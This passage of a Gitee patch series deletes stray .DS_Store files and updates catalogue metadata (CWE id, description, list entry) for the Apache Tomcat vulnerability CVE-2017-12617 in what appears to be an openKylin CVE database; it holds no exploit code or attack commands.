z_|s=`9JVjtx7wcvy~*L~{iku1wt}cP5<<}J0rK_pAnL}GMm&zXiEx|Q4}Qh39In28
ze*XC3)>>`z(c_D?+WC{sjkVg=qpgdJivQYM@4WZvVLu#1@sH2}hnL@UX*v6Rb>)2C
zGQ-p6C<^0<R|9*{c^jjWS;xRupSy;o;VV#@*DCjkG1h8?&*pPRbQ-Qmi&LU5oghCE
z>Q}8Y4^huyWBBaD_cgU=VOMAuJ!22G9Rj_JzA?nR7<Dwq<@&R@K4!p3?w1i_>)7+=
zs<ZHAj57jbnvGzirP6*dDy@W>2Jjuib6a6qQ4?FH58#=50xP7tf@o=?E4VMT=p|+t
zO3f#_>P1nL;iD^G=4(oG{n5jUw&JNuu1+z^I@BE^Hdg4!o`vXXj`GI!Ecob%Vq?_6
zI#j_bMeGyUGv$#LH$C3J(PIJ+9aJAjmTEtei$ASgoFH#p+sKAJrc}3yEdvwaUN9B(
zrj3?dnCK-zM~GyKxk<%BDP%_RxW-Lhkv<kp_vt_(ITt3fOrId~E_^<q52<ORB?l(D
zgwapoxr<ZHRO;Epmf?2@zkJtCbi}M-;afw)G95^7=G7JJ-p(po=n_2hy`zsf^qm~N
zVGetSEFOaq+4JK{wy;HHyeG3$_Xw_Gg-lRk17uR`fIeU$7cqOTP1ToJFAG-$D#E%8
zXlO?%TK#5dwIDedC=_dCqDnvwWF25mHkRwm!ur7VFqiCK0D<mRqLb}A!=szeY065O
z*a|&|@*^nlOw>g+*wJv6S&R}?Kv%;npsB*LYNq!ReF+rj0Ugf9vTh6S8@d&NJ;O?x
zTR&W17V_$r=iWF4oB~dPJD|WqHiudjcK7DL|KEX`x+ypXoB}r~;4SVncN+Nha+|M#
z{H(o(^E;e;Fm9Gvq2MBq<6-4-JU;N___uK~c7rV+cwf)$EVK9q$AACF0BfJk&kEfB
XKl?vhm(NnnU9sE$^HYgCw*UVJOrh;t

-- 
Gitee


From 6664999e49ccbe6e6ccb9cfb6236294ca67eb90c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:19:36 +0000
Subject: [PATCH 5/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20.DS?=
 =?UTF-8?q?=5FStore?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .DS_Store | Bin 8196 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 .DS_Store

diff --git a/.DS_Store b/.DS_Store
deleted file mode 100644
index 50fc29d51a3da9eb7a1ba750642f105c5b2113a2..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHM%}*0S6n|4twjy>BP|#?qy_i4{4S^VAs09?_2S^b?(7M|l%F1@8*<C;+Bt7fN
zKS1xEyqcJJ_8-uj@lVjJ2cvIhw$Kkh;>Bp3NoIbtZ{B<J<~O^u`&s}XnKkDOKsNvw
zSOuD`*nFpmaZwveERwV#60`@Nw>@s-mD!-H1)2fPfM!55pc&8%{2dJ7J6jav2k(6~
zs$0!~X5hbMK%5UrtOC;!mKDmQ0~?tFAU2~|7VOK9f5fB^Af_WMD?|wvqD&E$DTz`H
z66Fp=nd5jm(l0Ai=0N1k=qH+)L>UT+QV)`p>Oj&8b*mZB3^Xzza`z_4!#dDOuO@$g
zfg}B2Wszo)mc0>_qAdTVUGm%@92j^<Vol9^_O=);MyqiryTUiJp%tzL8OvW3SF@aZ
zcBOCGb1vP;nVqAYg_g^xFAZFWqRP@OmpObR!`GM-NZYI$Fycl$XLfIG4WAk8OP(DX
z-tJ3oojW_wmmC}#+}@5GU8&ROXL74vk?}`rnIt+YK&-L4JjRP?HEw=AS`B$!S<MI2
ztgI)#uXTUhfrQz9u%o@Ry{qfc;qI=UBS(93W`}L%R|~#~bCi4B&v<KevEaK-wq)g9
zR+tazgD~qpq&f3oo$3sA?(T|aH%q9~xhs(FF8h=+>2GRzIiTTuRevF8CW5@rJ#U%^
zZs>BhuoNK6lOZimvSp4lt|P-!B{3AtQ9nRzu$jN(SvK{iScZooFD_WVZ?OW+Y|guR
z&Q#<H=@u`ieJWh0Mm{MXQ|T*}&MDO~A*DJ1sq`h)HB1tpWt`DedRj^1c*^&}MYslY
zunG_12|R`8@Cx3*d-w=nNDDE^NzzLO$ptb(CddskLuScMa+~CpgIHxxk5y(<NF2my
zPuH_P^EfM@L}>2?2PoL!f(5Mh9w)*}^*!E<x*VT|piWQRG1YoK=#9ZL>iSSbzad_8
zl;og*b1|%bm9!s9uvzEvbDhT~<fGvkjEOZ=&)Wi5VG>4R9Iita#%q1X-qvY%U`!<$
z&nj$!Cu7b@3^3w;lvx<PSL+3L2jE%NbDuyjA*{$X{n}cb8r9Zun89c-!Wi!PIL=uF
zr*=NM2Q?NvQ9OSCgg^1q2zOY~?|)=m7tO%$Gti_=x<&p!{^Q^Of8VjT&<tn>{uu^H
z^H_E)gW*;_uIeKfxporkJ*=V#y|O}Sf{jea5#{R`apw<1>?cuG*rX#YD?|wv{X>AH
LK{uL#Kgz&2TozF`

-- 
Gitee


From b7b6fa8b31b66824c1747931c1ccfb4782d4b214 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:19:48 +0000
Subject: [PATCH 6/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?apache-tomcat/2017/yaml/.DS=5FStore?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-tomcat/2017/yaml/.DS_Store | Bin 6148 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-tomcat/2017/yaml/.DS_Store

diff --git a/cve/apache-tomcat/2017/yaml/.DS_Store b/cve/apache-tomcat/2017/yaml/.DS_Store
deleted file mode 100644
index 9f5ea099ea710d123ce3f1e3cfa6e7defebb2169..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKF-`+P3>-s>NHmdXDE9+IBn7lfND68sY6vM0rAm?RI-U(<dqIg#NU12$Sh8o=
z=h@9oagG7lVz-$A698knBR)I~&7Zpu?5t&sNaq=I++c<~Tr-|#&b`C~p0Oh9kUz(5
zoHfNBuXsoI*lpj|-F8ie|J-}}^fQbrnG}!$Qa}nw0V!~r0^WOR<BLQ^DIf);z>fm{
zeJFIt+OSWIPX|Mc0K^f~VO+;7K`fpi)`oo|Gc-#oF{#!@3`;umrPbAjePYsKaWl_p
zH(Q%fEN*AML^-S`DoOz<aIC<2ZYSRVSM*=z|6`JNQa}p)D+O${d|EE}O0BmJUe0@M
up})|-jkQtE5UrRPt(Y5c#a9P)#n*gZ8}^AoXFlje{Sk0oWK!TS6!-#GI~t7u

-- 
Gitee


From bcb80a10f19ffe54622fba0f47f03e4a6db4d259 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:40:19 +0000
Subject: [PATCH 7/9] update cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 李梓枫233 <2239118@buaa.edu.cn>
---
 cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
index 3fa338b5..6b9ffab7 100644
--- a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
+++ b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
@@ -14,7 +14,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2017-12617
-    cwe-id: None
+    cwe-id: CWE-434
     cnvd-id: None
     kve-id: None
   tags: cve2017, Apache, Tomcat，RCE
-- 
Gitee


From 2af7c1a2b8348d285f3ae9abbd1a858ea3809f8d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:42:03 +0000
Subject: [PATCH 8/9] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 李梓枫233 <2239118@buaa.edu.cn>
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 211571f6..f8c8e077 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -30,6 +30,7 @@ cve:
     - CVE-2022-29885
     - CVE-2020-9484
     - CVE-2020-1938
+    - CVE-2017-12617
   apache-Spark:
     - CVE-2022-33891
   apache-Flink:
-- 
Gitee


From 9b52f08693110dd597c5778df29773ad290c96f5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Tue, 18 Apr 2023 12:16:35 +0000
Subject: [PATCH 9/9] update cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 李梓枫233 <2239118@buaa.edu.cn>
---
 cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
index 6b9ffab7..28fd6b2b 100644
--- a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
+++ b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
@@ -1,8 +1,7 @@
 id: CVE-2017-12617
 source: https://github.com/cyberheartmi9/CVE-2017-12617
 info:
-  name: Apache Tomcat是美国阿帕奇（Apache）基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page（JSP）的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载，从而触发拒绝服务。
-  severity: high
+  name: Apache Tomcat是美国阿帕奇（Apache）基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page（JSP）的支持。
   description:
     如果默认servlet配置为参数readonly设置为false，或者WebDAV servlet启用为参数readonly设置为false时，所有操作系统上都存在emote代码执行（RCE）漏洞。
   scope-of-influence:
-- 
Gitee

